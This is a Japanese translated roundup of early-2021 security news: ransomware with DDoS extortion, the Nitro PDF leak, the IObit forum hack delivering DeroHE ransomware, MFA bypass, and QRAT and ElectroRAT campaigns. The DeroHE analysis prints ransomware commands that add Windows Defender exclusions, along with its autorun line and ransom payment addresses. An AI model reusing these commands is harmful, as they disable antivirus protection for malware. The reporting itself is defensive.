     Microsoftが、このバグをいつ修正する計画なのか不明である。あなたのコンピュータで脅威のアクターが、このバグを悪用する可能性が懸念されるのなら、このドライバは、待っている間の適切な代替である。


    別の身代金要求型マルウェアのギャングは、犠牲者に支払いを強制するために現在DDoS攻撃を使用している
    BleepingComputer : News>Security(2021/01/20)
     別の身代金要求型マルウェアのギャングは、犠牲者に彼らと接触することを矯正し、身代金交渉を行うためにDDoS攻撃を現在使用している。
     2020年10月、我々は身代金要求型マルウェアのギャングが、犠牲者に身代金を支払わせるための追加のツールとして、犠牲者のネットワーク、もしくはWebサイトに対してDDoS攻撃を悪用し始めたとレポートした。この時点で、この二つの戦術を使用していたオペレーションはSunCryptとRagnarLockerであった。
     distributed denial of service (DDoS、分散型DoS攻撃)は、脅威のアクターが、サービスを不可能にするためにWebサイトが取り扱えない過剰なリクエストでWebサイトやネットワーク接続を機能不全に追い込むものである。
     企業が身代金要求型マルウェアの被害を受けた時、多くの犠牲者はバックアップからリストアし、攻撃者との接触を行わない。
     Avaddon身代金要求型マルウェアのギャングは、犠牲者がこのギャングと接触し交渉を開始するまで、犠牲者のサイトやネットワークを引きずり倒すために現在DDoS攻撃を使用している。
     「また、彼らのサイトは現在DDoS攻撃下にある、我々は、彼らが接触してくるまで攻撃する」と、Avaddonは彼らの身代金要求型マルウェアのデータリークサイトで述べている。

    Avaddonデータリークサイト(画像をクリックすると拡大表示されます)

     Avaddonに現在DDoS攻撃を実行されている犠牲者の方々に、貴方方は、このWebサイトを最早見ることはできない。

    DDoS攻撃を実行しているAvaddon(画像をクリックすると拡大表示されます)

     BleepingComputerとこの展開を共有しているEmsisoftの脅威のアナリストBrett Callowは、「脅威のアクターが、身代金要求型マルウェアとDDoS攻撃を組み合わせていることを見るのは全く驚くようなことではない。DDoSは安価で簡単であり、場合によっては、迅速な支払いが最も苦痛の少ないオプションであると、一部の企業に納得させる役に立つ可能性がある。犯罪者が企業に圧力をかければかけるほど、 支払わせる可能性がより高くなる」と、CallowはBleepingComputerへのメールで述べている。
     Mazeが二重脅迫戦略を導入したとき、他の身代金要求型マルウェアのギャングは、直ちにこの方法を採用した。脅威のアクターが、同じ様にDDoS攻撃を採用するか否かを判断することは時期尚早である。


    ハッカーは、Nitro PDFの7700万ユーザレコードを含む全データベースをリークした
    BleepingComputer : News>Security(2021/01/20)
     Nitro PDFサービスユーザの7700万レコードを超えるeMailアドレス、名前、パスワードを含むデータベースが、本日無料でリークされた。
     リークされた14GBのデータベースは、ユーザのeMailアドレス、フルネーム、bcryptでハッシュされたパスワード、職名、企業名、IPアドレス、他のシステム関連情報を含む77,159,696レコードで構成されている。
     このデータベースは、ユーザーが、このセキュリティ侵害で自分の情報が危険にさらされ、インターネット上に漏洩されたか否かを確認できるHave I been Pwnedサービスにも追加されている。
     Nitroは、PDFとデジタルドキュメントを作成、編集、署名の手助けをするアプリケーションであり、Nitro Softwareが、10,000を超えるビジネスカスタマー(事業者顧客)と、凡そ180万のライセンスユーザ(使用権が認められているユーザ)を持つと主張するアプリケーションである。
     Nitroはまた、顧客がドキュメント作成のプロセスで、関連する共同作業者やあらゆる他の組織とドキュメントを共有するために使用できるクラウドサービスも提供している。

    Nitro PDFユーザレコードの内容(画像をクリックすると拡大表示されます)

    Nitroのデータ漏洩

     BleepingComputerが昨年報道した巨大なNitro PDF情報漏洩は、Google, Apple, Microsoft, Chase, Citibankを含む多くの著名な組織に衝撃を与えた。
     Nitro Softwareは、2020/10/21にオーストラリア株式取引所へのアドバイザリにおいて"low impact security incident"(低位影響セキュリティ事案)であり、影響を受けた顧客データはないと述べていた。
     しかしながら、BleepingComputerが後で発見したことだが、7000万のNitro PDFユーザレコード情報を含むデータベースと見做されているものが、1TBのドキュメントと共にオークションにかけられ、初値は$80,000(8,286,400円)であった。
     BleepingComputerは、Nitroアカウントの既知のeMailアドレスがオークションにかけられたデータベース中に存在していることを確認した後、盗まれたデータベースが本物であると断定した。

    盗まれたユーザレコードは無料でリークされた

     現在、ShinyHuntersの一員であると主張する脅威のアクターは、ハッカーフォーラムに無料で全データベースをリークした(この脅威のアクターは、ダウンロードリンクへのアクセス料を$3に設定している)。
     ShinyHuntersは、オンラインサービスをハッキングし、情報漏洩ブローカーや個人での販売を介して盗んだ情報を販売することで知られる悪名高い脅威のアクターである。
     以前、ShinyHuntersは、Homechef, Wattpad, Minted, Tokopedia, Dave, Promo, Chatbooks, Mathway,その他多くを晒した背後に自分たちが存在していると発言していた。この情報は真実であることが証明されている。

    無料でリークされたNitro PDFデータベース(画像をクリックすると拡大表示されます)

     悪意ある攻撃者は、漏洩されたユーザーの詳細を使用して、より信頼性の高いフィッシング攻撃、あるいはクレデンシャルスタッフィング攻撃(【訳注】 別名パスワードリスト型攻撃と呼ばれ、ユーザーアカウント情報の流出を悪用し、自動でさまざまなサービスに不正アクセスしようというサイバー攻撃(飛天ジャパンより))、を開始するので、影響を受けるNitro PDFユーザーは、パスワードを強力で一意のものに変更することを強く勧める。
     ユーザーは、パスワードを他の如何なるWebサイトやオンラインサービスでは使用していない一意で強力なものに変更する必要がある。
     パスワードマネージャーを使用することも推奨される。これは夫々のサイトで一意のパスワードを管理・生成する手助けとなる。


    VLCメディアプレイヤー 3.0.12: 複数のリモートコード実行のフローを修正
    BleepingComputer : News>Security(2021/01/20)
     先週、VideoLanは、多くの改善、機能、セキュリティフィックスを実行したWindows,Mac、Linux用のVLCメディアプレーヤー3.0.21をリリースした。
     このリリースは、Apple Siliconのネイティブサポートを改善し、macOSでのオーディオ音声歪を修正しているので、Macユーザにとっては重要なアップグレードである。
     バグの修正と改善に加えて、このリリースは、NSFOCUS Security TeamのZhen Zhouによってレポートされた多くのセキュリティ上の脆弱性を修正している。
     これらのバッファオーバーフローもしくは無効な間接参照の脆弱性は、「VLCのクラッシュか、ターゲットユーザの特権で任意のコード実行かのいずれかを実行することができた。」
     VideoLanのセキュリティブレチンによると、リモートユーザは、特別に細工されたメディアファイルを作成し、ユーザを欺いてVLCでそれを開かせることによって、この脆弱性を攻撃することができる。
     VideoLanは、この脆弱性が、VLCメディアプレーヤーをクラッシュさせるだろうと述べ、攻撃者は情報をリークしたり、リモードからそのデバイス上でコマンドを実行するために、この脆弱性を使用できると、彼らは警告している。

    成功した場合、悪意あるサードパーティは、VLCのクラッシュを引き起こすか、ターゲットユーザーの特権で任意のコードを実行する可能性があります。
    これらの問題自体が、このプレーヤーをクラッシュさせる可能性が最も高いのですが、ユーザー情報の漏洩とリモートコード実行を組み合わす可能性を排除することはできません。ASLRとDEPは、コード実行の可能性を減らすのに役立ちますが、バイパスされる可能性があります。

     VideoLanは、オンライン上でこれらの脆弱性が悪用した攻撃を確認していないと述べている。
     この脆弱性の緊急性とVLC 3.0.12の改善により、全てのユーザはバージョン3.0.21をダウンロードしインストールするよう強くアドバイスする。
     以下で、バージョン3.0.21の全てのチェンジログを読むことができる

    Access:
    * Add new RIST access module compliant with simple profile (VSF_TR-06-1)

    Access Output:
    * Add new RIST access output module compliant with simple profile (VSF_TR-06-1)

    Demux:
    * Fixed adaptive's handling of resolution settings
    * Improve Bluray tracks support
    * Improve WMV seeking and DASH support
    * Fix crashes in AVI, MKV modules

    Audio output:
    * Fix audio distortion on macOS during start of playback

    Video Output:
    * Direct3D11: Fix some potential crashes when using video filters

    macOS:
    * Add native support for Apple Silicon / ARM-64
    * Visual UI adaptations for macOS Big Sur
    * Fix displaying EQ bands in the UI depending on which frequency presets are set for the EQ in advanced preferences
    * Fix UI issues in bookmarks window

    Misc:
    * Several fixes in the web interface, including privacy and security improvements
    * Update YouTube and Vocaroo scripts
    * Fix rotation filter mouse handling
    * Update translations


    IObitフォーラムがハックされ身代金要求型マルウェアがメンバーに拡散している
    BleepingComputer : News>Security(2021/01/18)
     Windowsユーティリティ・デベロッパIObitが週末に渡ってハックされ、そのフォーラムのメンバーに奇妙なDeroHE身代金要求型マルウェアを配布する広汎な攻撃が実行されている。
     IObitは、Advanced SystemCareのようなWindowsシステムの最適化とアンチマルウェア プログラムで知られるソフトウェア・デベロッパである。
     週末に渡り、IObitフォーラムのメンバーは、フォーラムメンバーの特別な特典として、ソフトウェアの1年間の無料ライセンスを取得できると題されたIObitからと主張するeMailを受け取り始めた。

    IObit「販促」eMail(画像をクリックすると拡大表示されます)

     このeMailに含まれている'GET IT NOW'リンクは、hxxps://forums.iobit.com/promo.htmlにリダイレクトする。このページは最早存在していないが、攻撃の時点では、hxxps://forums.iobit.com/free-iobit-license-promo.zipファイルを配布していた。
     このzipファイル[VirusTotal]は、正規のIObit License Managerプログラムからのデジタル署名されたファイルを含んでいたが、下図に示したように、IObitUnlocker.dllは、未署名の悪意あるバージョンに置き換えられていた。

    悪意あるIObitUnlocker.dll(画像をクリックすると拡大表示されます)

    IObit License Manager.exeが実行されると、悪意あるIObitUnlocker.dllが実行され、C:\Program Files (x86)\IObit\iobit.dll[VirusTotal]にDeroHE身代金要求型マルウェアがインストールされ、実行される。
     殆どの実行ファイルは、IOBitの認証で署名され、このZipファイルがIObitのサイトにホストされていたので、ユーザは、これが正規の販促であると考えて、この身代金要求型マルウェアをインストールした
     IObitと他のフォーラム[1,2]のレポートに基づくと、これは、全てのフォーラムメンバーをターゲットにした広汎な攻撃である。

    DeroHE身代金要求型マルウェアの詳細な検証

     BleepingComputerは、この身代金要求型マルウェアが犠牲者のコンピュータで実行された時に何が発生するのかを説明するために、この身代金要求型マルウェアを解析した。
     最初に起動した時、この身代金要求型マルウェアは、Windowsにログインしたときに"rundll32 "C:\Program Files (x86)\IObit\iobit.dll",DllEntry"コマンドを実行する"IObit License Manager"と名付けられたWindows autorunを追加する。
     この身代金要求型マルウェアを解析したEmsisoftのアナリストElise van Dorpは、この身代金要求型マルウェアが、このDLLの実行を可能にするためにWindows Defenderの排除を追加すると述べている。

    @WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"
    @WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"\Temp\\"
    @WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionExtension=\".dll\"
    @WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionProcess=\"rundll32.exe\"

     ここで、この身代金要求型マルウェアは、"Please wait. It may take a little longer than expected. Keep your computer running or screen on!'と述べるIObit License Managerからとするメッセージボックスを表示する。この警告は、この身代金要求型マルウェアが終了する前に、犠牲者が彼らのデバイスをシャットダウンすることを妨げるために、このマルウェアが表示するものである。

    コンピュータをシャットダウンさせないためのインチキ警告

     犠牲者のファイルを暗号化すると、この身代金要求型マルウェアは、暗号化したファイルに .DeroHE拡張子を追加する。

    DeroHE身代金要求型マルウェアによって暗号化されたファイル(画像をクリックすると拡大表示されます)

     以下に示したように、暗号化されたファイルは夫々、情報文字列をファイルの末尾に追加されている。この身代金要求型マルウェアは、身代金が支払われた場合に、ファイルの復号にこの情報を使用する可能性がある。

    {"version":"3","id":"dERiqiUutvp35oSUfRSTCXL53TRakECSGQVQ2hhUjuCEjC6zSNFZsRqav
    VVSdyEzaViULtCRPxzRwRCKZ2j2ugCg5r9SrERKe7r5DVpU8kMDr","parts":[{"size":193536,"esize":193564,
    "offset":0,"rm":"Phj8vfOREkYPKA9e9qke1EIYOGGciqkQBSzfzg=="}],"ext":".png"}

    暗号化されたファイルのバイナリ表示(画像をクリックすると拡大表示されます)

     Windowsデスクトップに、この身代金要求型マルウェアは、暗号化されたファイルのリストを含むFILES_ENCRYPTED.htmlと、脅迫文READ_TO_DECRYPT.htmlの二つのファイルを作成する。
     この脅迫文は、'Dero Homomorphic Encryption'というタイトルであり、DEROという暗号通貨を推奨している。この脅迫文は、犠牲者に対して復号プログラムを得るにはリストされているアドレスに200コイン(およそ100$)送信するように告げている。

    DeroHE身代金要求型マルウェアによって暗号化されたファイル(画像をクリックすると拡大表示されます)

     この脅迫文に含まれているのは、この身代金要求型マルウェアのTorサイトhttp://deropayysnkrl5xu7ic5fdprz5ixgdwy6ikxe2g3mh2erikudscrkpqd.onionである。これは支払いを実行するために使用される。
     特に興味を惹くのは、IObitがDEROで$100,000支払えば、全ての犠牲者を復号できると、このTorサイトで述べていることである。
     「このアドレスへ100000DEROコイン我々に送信するようにiobit.comに告げる。dERopYDgpD235oSUfRSTCXL53TRakECSGQVQ2hhUjuCEjC6zSNFZsRqavVVSdyEzaViULt
    CRPxzRwRCKZ2j2ugCg26hRtLziwu」
     「支払いが到着次第、暗号化された全てのコンピュータは復号される。これは、貴方方のコンピュータが感染したのはIOBITの失敗によるものである」と、DeroHEのTor支払いサイトは述べている。

    Dero身代金要求型マルウェアのTor支払いサイト(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアは弱点が解析されており、無料で復号できるか否かは不明である。
     更に、脅威のアクターが約束をまもり、支払いが実行された場合に復号プログラムを提供するか否かは不明である。

    Iobitフォーラムはセキュリティ侵害されたようである

     インチキの販促ページを作成し、悪意あるダウンロードをホストするために、攻撃者はIObitフォーラムをハックし、管理者アカウントへのアクセスを取得したと思われる。
     この時点で、このフォーラムは依然として改竄されたままのようである。恰も、削除されたページを訪問したような404エラーコードを戻してくる。このWebページはブラウザ通知に同意するためのダイアログを表示する。あなたのブラウザが同意すると、アダルトサイト、悪意あるソフトウェア、他の好ましからざるコンテンツを奨励するデスクトップ通知を受け取ることになる。

    セキュリティ侵害されたIObitフォーラムのページ(画像をクリックすると拡大表示されます)

     更に、このページの何処かをクリックすると、アダルトサイトの広告を表示する新しいタブが開く。他のサイト セクションも、フォーラムリンクをクリックすると、似たようなアダルトページにリダイレクトされるようにセキュリティ侵害されているようである。
     以下に示したように、全てのページに発見されていない悪意あるスクリプトを挿入することで、このフォーラムをセキュリティ侵害した。

    セキュリティ侵害されたIObitフォーラムのページ(画像をクリックすると拡大表示されます)

     BleepingComputerは、この攻撃に関連する質問をIObitに送ったが、回答は未だない。

    2021/1/19 アップデート: Ronnyとして知られるセキュリティ研究者は、IObitはフォーラムのソフトウェアとしてvBullentin 5.6.1を使用中であると、BleepingComputerに告げてきた。
     vBullentinのこのバージョンは、リモートアタッカーがこのフォーラムの制御を取得することが可能な既知の脆弱性を持っている。


    サイバー犯罪者は多要素認証をバイパスし、組織のクラウドサービスにアクセスしている
    Tripwire : The State of Security(2021/01/14)
     米国の国土安全保障省国家保護・プログラム総局(Cybersecurity and Infrastructure Security Agency、CISA)は、最近幾つかの攻撃の成功を受けて、企業が、彼らのクラウドベース アカウントをより適切に防御するための警告を発行した。
     公開されたCISAのアドバイザリによると、COVID-19(【訳注】 新型コロナウィルス感染症の病名)パンデミックの間に、多くの従業員が様々なラップトップや個人のデバイスでリモートワークを始めた時に攻撃数は増加している。
     CISAは、攻撃者達が、人間の弱点を攻撃するフィッシングや、企業のクラウドアカウントのセキュリティ設定への攻撃を企てるブルートフォース ログインを含む様々なテクニックを使用していたことに気づいた。
     このアドバイザリにおいて説明されている或る場合において、組織は、そのネットワークにアクセスする時にVPNの使用を要求しておらず、意図的にリモートワーカーがシステムにアクセスし易いように設計された緩い設定が、組織のネットワーク脆弱性を残したままにしていたために、誰もがブルートフォース ログイン攻撃を介してアクセスできた。
     他の攻撃では、悪意あるハッカーは、ユーザがログイン時に要求される正当なサイトにホストされている「安全なメッセージ」へのリンクであると主張するeMailフィッシング攻撃を介して、ユーザのクラウドサービスアカウント ログイン認証をフィッシングしていることが確認されている。
    「標的となる受信者が、彼らの認証情報を提供した後、脅威のアクターは、盗んだ認証情報を使用して、ユーザーのクラウドサービスアカウントへの最初のアクセスを取得している。」 「CISAは、海外の場所から発信された、この脅威のアクターのログインに気づいた(ただし、この脅威のアクターはプロキシ、または、オニオンルーター(Tor)を使用して彼らの位置を分かり難くしていた可能性がある)。 次に、この脅威のアクターは、ユーザーのアカウントからその組織の内部の別のアカウントにメールを送信している。幾つかの場合では、これらのeMailは、組織のファイル ホスティングサービスであるかのようなドキュメントへのリンクを含んでいた。」
     CISAの警告で最も興味を惹くことは、強く推奨されているセキュリティ基準である多要素認証をバイパスし、クラウドサービス アカウントをセキュリティ侵害した証拠が確認されていることである。

     先述のケースでは、悪意あるハッカーは他要素認証を回避するために“pass-the-cookie”攻撃を使用していたと確信していると、CISAは発言している。
    【訳注】“pass-the-cookie”について: 基本的に、Webアプリケーションの上にMFA(多要素認証)を配置すると、ログインしているユーザーは、モバイルデバイスでプッシュ通知を受け入れるなど、本人であるという追加の証拠を提供するように求められます。これらのテストをすべて通過すると、アプリへのアクセスが許可されます。その時点で、そのユーザーのセッション用にブラウザCookieが作成され、保存されます。
     誰かが適切なブラウザCookieを抽出できた場合、途中ですべてのMFAチェックポイントをバイパスして、別のシステムのまったく別のブラウザセッションで別のユーザーとして認証できます。(上記リンク先の一部分をGoogle翻訳)

     多要素認証はセキュリティを強固にし、犯罪者がアカウントに侵入することをより困難にする優れた方法であるが、成功への強い意欲があるハッカーにとってセキュリティ侵害を不可能にしていることを意味していない。このことを心に留めおくことは価値あることである。
     例えば、2018年3月、暗号通貨取引所Binanceは、緊急システムが2分間の異常な取引を確認した後、全ての引き出しを停止した。
     その後、このフィッシング攻撃は、Binanceを装うサイトにユーザを連れ込み、彼らのパスワードと多要素認証のコードを入力するように求めることが判明した。多要素認証コードは30秒間有効であったため、攻撃者は本物のサイト用の取引APIキーを生成し使用することができた。
     攻撃者がソーシャルエンジニアリングや技術的な攻撃を介して他要素認証を回避できることは明らかであるが、このことは、貴方方が他要素認証を使用しても仕方がないということを意味していない。Microsoftの言葉を借りれば、「多要素認証を使用すると、アカウントがセキュリティ侵害される可能性は、99.9%以上低くなる。」
     明らかに、ユーザは、攻撃者が作成したインチキのサイトに多要素認証のコードを入力しているのではなく、本物のサイトにのみ多要素認証のコードを入力しているという注意が必要である。
     攻撃者が、企業のクラウドベースのサービスへのアクセスを獲得すると、組織に関する情報の収集、データの盗用、他の従業員やパートナーのシステムを攻撃、今後のアクセスがブロックされるようにログイン認証が変更された場合でさえ、機密情報に継続してアクセスできるようにメール転送ルールを設定するなど、多くの奥の手を所有することができる。
     CISAは、そのWebサイトに、組織が彼らのクラウドセキュリティ慣行を強固にすることに役に立つ長大な勧告リストを公開した。このリストには、多要素認証の実施、eMail転送に関する制限、仕事に個人のデバイスを使用しないことの推奨、従業員へのセキュリティ意識向上のためのトレーニングが含まれている。


    Microsoft: 現在脆弱性攻撃されているDefenderの0-Dayをパッチ
    BleepingComputer : News>Security(2021/01/12)
     Microsoftは、Microsoft Defender中の0-Dayの脆弱性を解決した。ただ、このパッチをリリースする前に脅威のアクターによる攻撃は行われていた。
     0-Dayとは、そのベンダーが公式のパッチをリリースする前にオンライン上で積極的な脆弱性攻撃が行われている脆弱性、あるいは、公開されている概念の実証の脆弱性攻撃があるバグのことである。
     Microsoftが本日パッチした0-Dayは、CVE-2021-1647として追跡されている。この脆弱性は、Malware Protection Engineコンポーネント(mpengine.dll)中に発見されたリモートコード実行(RCE)の脆弱性である。

    利用できる概念の実証

       この0-Dayに関する概念の実証(PoC)の脆弱性攻撃は可能だが、脆弱性攻撃は、殆どのシステムで不可能であったり、幾つかのシチュエーションでは、このPoCは失敗する可能性があると、Microsoftは発言している。
     この脆弱性によって影響を受ける最新のMicrosoft Malware Protection Engineは、バージョン1.1.17600.5である。この0-Dayは、バージョン1.1.17700.4では解決されている。
     Microsoft Malware Protection Engineのバージョン番号を調べる方法の詳細に関しては、こちらを参照されたい。この脆弱性の影響を受けないシステムは、Microsoft Malware Protection Engineのバージョン1.1.17700.4以降を実行しているはずである。
     「お客様は、Microsoft Malware Protection Engineの最新バージョンと定義の更新が、Microsoftマルウェア対策製品用にアクティブにダウンロードおよびインストールされていることを確認する必要があります」と、Microsoftは発言している。

    Defenderのセキュリティアップデートは自動的にインストールされる

       このMicrosoftのアドバイザリは、脆弱性のあるMicrosoft Defenderのバージョンを実行しているシステムには、自動的にインストールされるので、顧客はCVE-2021-1647セキュリティアップデートをインストールするために、如何なるアクションも必要としないと追加している。
     「絶えず変化する脅威の状況に対応して、Microsoftは頻繁にマルウェア定義とMicrosoft Malware Protection Engineをアップデートしている」と、Microsoftは発言している。
     Microsoft Defenderは、Microsoft Malware Protection Engine(スキャン、検出、クリーニングに使用されるコンポーネント)とマルウェア定義の2つを、企業とエンドユーザの両方に対し自動的にアップデートし続けている。
     通常、Microsoft Malware Protection Engineアップデートは、一月に一度、もしくは、マルウェア定義が一日に3回アップデートされる間に、新たに発見された脅威に対して保護する必要がある時にリリースされる。
     Microsoft Defenderはエンジンと定義の更新を一日に数回チェックできるが、ユーザが、セキュリティアップデートを即時にインストールしたいのなら、あらゆる時に手動チェックすることもできる。
     Microsoftは、Microsoft PSExecユーティリティ中にある0-Dayの特権の昇格に関する脆弱性の公式パッチを未だリリースしていない。このバグは先週、0patchプラットフォームを介して無料のマイクロパッチを受け取っている。


    それはトランプのセックスビデオではない、RATである
    Threat Post : News(2021/01/06)
     退任するドナルド・トランプ大統領が引き続き見出しの大半を占めているため、サイバー犯罪者はマルウェアを配布するための疑似餌としてトランプのセックスビデオに着目した。
     Trustwaveの研究者の新しいレポートによると、このキャンペーンは、マルウェアダウンローダーにファイル名“TRUMP_SEX_SCANDAL_Video”とラベリングしていることが明らかにされた。これはeMail中の悪意あるリンクを介して拡散するものである。
     クリックすると、ユーザに猥褻なビデオをもたらすのではなく、犯罪者に、感染したシステムに総合的なリモートアクセスを提供するためのQRATをインストールする。

    QRAT

       Quaverse Remote Access Trojan (QRAT)は、2015年に発見されたJavaベースのリモートアクセス トロイ(RAT)でありQuaverseのプラグインによって強化されていると、Trustwaveは説明している。
     昨年の8月の始め、Trustwaveの研究者は、QRATを押し付けようとするフィッシングスカムが増加しているとレポートしていた。Trustwaveの研究者Diana Loperaによると、この最新のフィッシングの企てで興味深いのは、件名とファイル名が無関係なことだとしている。

    eMail(画像をクリックすると拡大表示されます)

     件名が“GOOD LOAN OFFER!!”になっているこのeMailは、一瞥して通常の出資スカムである。「このeMailの件名も本文もありきたりのものである。興味あることは、このeMailに添付されているアーカイブが“TRUMP_SEX_SCANDAL_VIDEO.jar”と名付けられたJava Archive(JAR)ファイルを含んでいることにある」と、Loperaは、この発見をレポート中で発言している。
     Loperaは、選挙を取り巻く最近の見出しが、悪意のある攻撃者が詐欺を行うために十分な隠れ蓑を提供したと付け加えている。
     「添付ファイルに使用されているファイル名は、メールのテーマとは全く無関係であるため、悪漢共は、最近終了した大統領選挙によって齎された狂乱に乗じようとしているのではないかと疑っている」と、Loperaは発言している。

    QRATの変種

     このQRATは、前身のマルウェアから幾つかの変種が発生しているため悪名高いものであると。Loperaは説明している。
     「この脅威は、我々が最初に調査して以来ここ数カ月間で顕著に拡大している」と、更に「 QNode RATでシステムに感染するという同じ最終目標を達成するために、JARファイルダウンローダーの特性と挙動は改良されている」とLoperaは発言している。
     このコードのバージョンは、base64で暗号化されている。このモジュールは、Allatori Obfuscator(【訳注】 第2世代の難読化ツールのファミリーに属するJava難読化ツール(Updatestarより))で隠されている。犠牲者のネットワーク情報は、ここで“hxxps://wtfismyip[.]com”から取得される。最後に、パスワード リカバリもまたChrome, Firefox, Thunderbird, Outlookでサポートされていると、このレポートは説明している。
     「このダウンローダーの悪意あるコードは、追加されたジャンクデータと共に番号付けされたファイルに分割されている」と、Loperaは記述している。
     最新の.JAR変種も詐欺用のMicrosoft ISCライセンスを含んでいる。これは、ユーザに、この.JARファイルがリモート侵入テスト(【訳注】 通信ネットワークで外部と接続されたコンピュータシステムの安全性を調査するテスト手法の一つ(IT用語辞典より))のために実行されると告げるメッセージを提供していると、このレポートは発言している。
     “TRUMP_SEX_SCANDAL_VIDEO.jar”ファイルの実行時に、そのコピーが作成され次に、%temp%(【訳注】 C:\Windows\TEMP(システム)、C:\Users\ユーザー名\AppData\Local\Temp(ユーザ))フォルダから実行される」更に、「次に、侵入テスト用に使用されるリモートアクセスソフトウェアであるこの悪意あるJARファイルが実行される。このサンプルの悪意ある挙動は、‘Ok, I know what I am doing’ボタンをクリックすると現れ始める」と、Loperaは発言している。
     この変種と今までの既知の.JARファイルとのもう一つの相違は、コードの文字列が欠如していることである。
     彼女の観察では、「第三、この脅威に関連するファイルを以前同定した文字列“qnodejs”は、この変種中には存在していない。」
     この.JARファイルの早期のバージョンは、C2サーバ(コマンドアンドコントロール サーバ)とコミュニケーションするために必須のQHubサブスクリプションに関する情報を含んでいたと、このレポートは発言している。
     「我々が早期の変種中に観察したQHubサブスクリプション ユーザに関する情報は、このJARファイルには最早含まれていない」と、Loperaは発言している。

    「アマチュア」の試み

     この最新のQRAT変種からシステムを保護するために、Loperaは、電子メール管理者がセキュリティ ゲートウェイで.JARファイルをブロックすることを推奨している。
     「添付ファイルのペイロードは、今までの変種に比べ幾つかの改悪が見られるが、このeMailキャンペーン自体は、むしろアマチュアっぽいものであり、もしも、このeMailがより洗練されたものであったなら、この脅威が成功裏に拡散するチャンスは高いと確信している」と、「悪意あるJARファイルからのスパムは、非常に一般的なものであり、このようなRATにしばしばつながっている」と、Loperaは記述している。


    クロスプラットフォームのElectroRATマルウェアは暗号通貨のウォレットを空にする
    BleepingComputer : News>Security(2021/01/05)
     セキュリティ研究者は、数千人のWindows, Linux, macOSユーザの暗号通貨ウォレットを空にするために使用されている新しいリモートアクセス トロイ(RAT)を発見した。
     12月に発見されElectroRATと名付けられたこのクロスプラットフォームRATマルウェアは、Go言語で書かれており、2020年初頭以来、暗号通貨ユーザをターゲットにした作戦の一部として使用されている。

    一年に数千人が感染している

       ElectroRAT作戦の背後にいる攻撃者は、このRATを作成し、カスタムElectron(【訳注】 旧称: Atom-Shell。Atomエディタを開発するために生まれたクロスプラットフォームデスクトップアプリケーションエンジン(Qiitaより))アプリケーション中に挿入した。このRATは、暗号通貨取引管理ツール(JammやeTrade)のように表示及び動作する、また、暗号通貨ポーカーアプリケーション(DaoPoker)のように動作するものもある。
     犠牲者のコンピュータ上で起動すると、これらのアプリケーションは、悪意あるElectroRATバックグラウンドプロセスから、犠牲者の注意をそらすために設計されたユーザインターフェイスを前面に表示する。

    (画像をクリックすると拡大表示されます)

     今週はじめBleepingComputerとシェアしたIntezerのレポートによると、潜在的な犠牲者を誘惑するために、この脅威のアクターはソーシャルメディア(Twitter、Telegram)や専用のオンラインフォーラム(bitcointalk、SteemCoinPan)でトロイの木馬化したアプリケーションを宣伝している。
     この悪意あるアプリケーションは、2020年1月から12月の間に数千の犠牲者によってダウンロードされ、コマンドアンドコントロールサーバ(C2)アドレスを取得するために、このマルウェアによって使用されたPatebin(【訳注】 ユーザーがソースコードのサンプルなどのテキストを公開するために使われているWebアプリケーション(Wikipediaより))ページの一つでのアクセス回数は、年間におよそ6500回になっている。
     「このトロイ化されたアプリケーションとElectroRATバイナリは、記述の時点で、VirusTotalでは、検出率は低いか、完全に未検出かのいずれかである」とIntezerは発言している。
     感染すると、このマルウェアのオペレータによって、犠牲者のウォレットは空にされる。一部の犠牲者は、この危険なアプリケーションを他の人に警告している。

    (画像をクリックすると拡大表示されます)

    既製品からカスタムマルウェアに

     ElectroRAT C2情報をアップロードした同じユーザによって公開されたC2 Pastebinページは、この攻撃者が既成のAmedeyKPOT情報を盗むトロイも利用していることも示している。
     どちらのスティーラーもWindowsプラットフォームのみを標的にしており、感染後も殆ど検出されないようにしている著名なトロイである。
     この新しいGo言語ベースで未検出のElectronRATマルウェアは、同様の能力を持ち複数のプラットフォームををターゲットにすることが可能なので、ステルス作戦には大変効果的である。  ElectroRATは、Windows, Linux, macOSの亜種に共通する多くの機能を詰め合わせている(「キーロガー、スクリーンショットの取得、ディスクのファイルのアップロード、ファイルのダウンロード、犠牲者のコンソール上でコマンドを実行することを含む」)ので大変侵略的なマルウェアである。
     「スクラッチから書かれたRATを見ることは、そして、暗号通貨ユーザの個人情報を盗むために使用されたのは大変珍しい」とIntezerは結論している。
     「偽のアプリケーションやWebサイトのような様々なコンポーネントを含み、関連するフォーラムとソーシャルメディアを介してマーケティング/宣伝を行うこのような広汎な標的型キャンペーンを見るのは大変稀である。」

    (画像をクリックすると拡大表示されます)

    あなたのコンピュータ上でトロイ化されたJamm, eTrade, DaoPokerアプリケーションをダウンロードし起動したのであれば、即座にこれらのプロセスを終了させ(Kill)し、システムから全ての関連するファイルを完全に削除しなさい。
    あなたの暗号通貨ウォレットが未だ空っぽになっていないのであれば、即座に全ての財産を新しいウォレットに移動させ、可能な限り早く全てのパスワードを変更しなさい。
     Intezerはまた、インメモリアーティファクトであらゆるElectornRATの検出を支援するYARAルール(【訳注】 マルウェアの研究者たちのために作られた、マルウェアを検知・解析・分類するための、オープンソースのプログラム(SIOSセキュリティブログより))も提供している。
     12月、Intezerはまた、自己拡散能力を持つGo言語ベースの別のマルウェアを発見している。このマルウェアは、WindowsとLinuxサーバでXMRig暗号通貨採掘者(マイナー)を配備するために使用されている。


    注意: PayPalフィッシング テキストは、あなたのアカウントは'limited'(制限されている)と述べている
    BleepingComputer : News>Security(2020/12/31)
     PayPalテキストメッセージ フィッシングキャンペーンが進行中であり、あなたのアカウント認証や、なりすまし犯罪に使用することのできる他の重要な情報を盗もうとしている。
     Paypalが、疑わしい、もしくは、不正な行動をアカウント上で検出したとき、そのアカウントのステータスは、一時的に金銭の引き出し、送金、受取が制限される'limited'に設定されていた。
     新しいSMSテキストフィッシング(Smishing、【訳注】 スミッシングとはSMSを用いたフィッシング詐欺(Wikipediaより))キャンペーンは、PayPalからであると装っており、リンクをクリックしてアカウントを確認した場合を除き、あなたのアカウントは永久に制限されると述べている。
